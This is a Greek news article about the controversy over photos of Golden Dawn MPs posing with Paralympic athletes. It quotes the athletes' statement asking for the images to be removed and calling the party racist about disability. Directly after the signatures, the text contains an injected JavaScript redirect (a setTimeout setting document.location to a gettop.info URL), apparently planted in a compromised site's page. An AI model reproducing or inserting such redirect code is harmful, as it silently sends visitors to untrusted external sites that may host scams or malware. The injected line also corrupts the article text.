Σάλος με τις φωτογραφίες των Παραολυμπιονικών με βουλευτές της ΧΑ – Τώρα ζητούν να «κατέβουν»

0
32

 

Σε ειδική τελετή της Βουλής για τους Παραολυμπιονίκες οι βουλευτές της Χρυσής Αυγής φωτογραφήθηκαν με τους Παραολυμπιονίκες.

Οι φωτογραφίες αυτές που αναρτήθηκαν στην ιστοσελίδα της Χρυσής Αυγής, προκάλεσαν σάλο και πολύ αρνητικά σχόλια. Μάλιστα, η Ομοσπονδία της Παραολυμπιακής ομάδας ζήτησε να κατέβουν από την ιστοσελίδα οι συγκεκριμένες φωτογραφίες ενώ όπως σημειώνεται σε σχετική ανακοίνωση των μελών της Παραολυμπιακής Ομάδας: «Κάποιοι προσπάθησαν να το εκμεταλλευτούν, προφανώς για τους δικούς τους σκοπούς. Εμείς όμως δεν είμαστε διατεθειμένοι να παίξουμε το παιχνίδι τους«.

Αναλυτικά η ανακοίνωση από τα μέλη της Ελληνικής Παραολυμπιακής Ομάδας:

«Οι φωτογραφίες μας που αναρτήθηκαν στους επίσημους δικτυακούς τόπους της Χρυσής Αυγής, έγιναν αντικείμενο συζήτησης και παραφιλολογίας. Κάποιοι προσπάθησαν να το εκμεταλλευτούν, προφανώς για τους δικούς τους σκοπούς. Εμείς όμως δεν είμαστε διατεθειμένοι να παίξουμε το παιχνίδι τους.

Άλλωστε η Χρυσή Αυγή ουδέποτε μας εξέφραζε ως πολιτικό κόμμα με δεδομένες τις ρατσιστικές αντιλήψεις τους πάνω στο θέμα αναπηρία.

Ζητάμε τα φωτογραφικά στιγμιότυπα που αναρτήθηκαν στο επίσημο site της Χρυσής Αυγής να αποσυρθούν, προκειμένου να αποκατασταθεί το όνομα και η λάμψη ολόκληρου του Παραολυμπιακού Κινήματος.

Τα μέλη της ελληνικής παραολυμπιακής ομάδας

Παύλος Μάμαλος

Δημοσθένης Μιχαλεντζάκης

Δημήτρης Μπακοχρήστος

Πασχάλης Κουλούμογλου

Γκρέμισλαβ Μωϋσιάδης

Γεράσιμος Λιγνός» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here